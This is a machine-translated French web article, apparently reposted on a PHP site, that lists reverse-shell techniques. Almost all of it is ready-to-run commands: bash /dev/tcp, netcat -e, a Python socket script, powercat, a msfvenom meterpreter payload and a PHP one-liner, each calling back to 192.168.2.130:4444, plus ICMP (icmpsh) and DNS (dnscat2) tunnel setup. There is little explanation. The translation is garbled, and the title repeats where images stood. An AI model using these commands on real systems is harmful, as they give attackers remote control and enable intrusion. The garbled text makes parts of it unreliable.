Que sont les obus à rebond ?

王林
Libérer: 2023-05-18 22:01:04
avant
2074 Les gens l'ont consulté

1.bash rebond

bash -i >& /dev/tcp/ip_address/port 0>&1
Copier après la connexion

Que sont les obus à rebond ?

2.nc rebond

nc -e /bin/sh 192.168.2.130 4444
Copier après la connexion

Que sont les obus à rebond ?

3.python

import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.2.130" , 4444 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])
Copier après la connexion

Que sont les obus à rebond ?

4.powercat

Import-Module .\powercat.ps1
powercat -c 192.168.2.130 -p 4444 -e cmd.exe
Copier après la connexion

Que sont les obus à rebond ?

5.msf après avoir généré l'exe Door

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
Copier après la connexion

6 .shell de rebond php

php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i &3 2>&3");'
Copier après la connexion

Que sont les obus à rebond ?

Que sont les obus à rebond ?

7.ICMP

关闭icmp响应,不然shell一直跳,恢复是0

sysctl -w net.ipv4.icmp_echo_ignore_all=1

python icmpsh_m.py 源 目标
python icmpsh_m.py 192.168.2.137 192.168.2.135
Copier après la connexion

fonctionnant sous Windows7 :

icmpsh.exe -t 192.168.2.137
Copier après la connexion

Que sont les obus à rebond ?

Que sont les obus à rebond ?

8.DNS

https://downloads.skullsecurity .org/dnscat2/

Ici, nous utilisons dnscat2, qui est téléchargé ici et est divisé en versions Windows et Linux, serveur et client.

Et il est recommandé d'utiliser vs2008 pour compiler

Installer

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2
cd server
sudo gem install bundler
bundle install
sudo ruby ./dnscat2.rb
Copier après la connexion

kali

ruby dnscat2.rb --dns host=0.0.0.0,port=53531
ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)
ruby dnscat2.rb xxx.com
Copier après la connexion

dans Windows7 :

./dnscat --dns server=192.168.2.130,port=53531
./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)
./dnscat xxx.com
Copier après la connexion

Après une connexion réussie

Que sont les obus à rebond ?

Que sont les obus à rebond ?

Voir l'enregistrement

Que sont les obus à rebond ?

Choisissez une connexion

"Utiliser le shell"

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:yisu.com
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal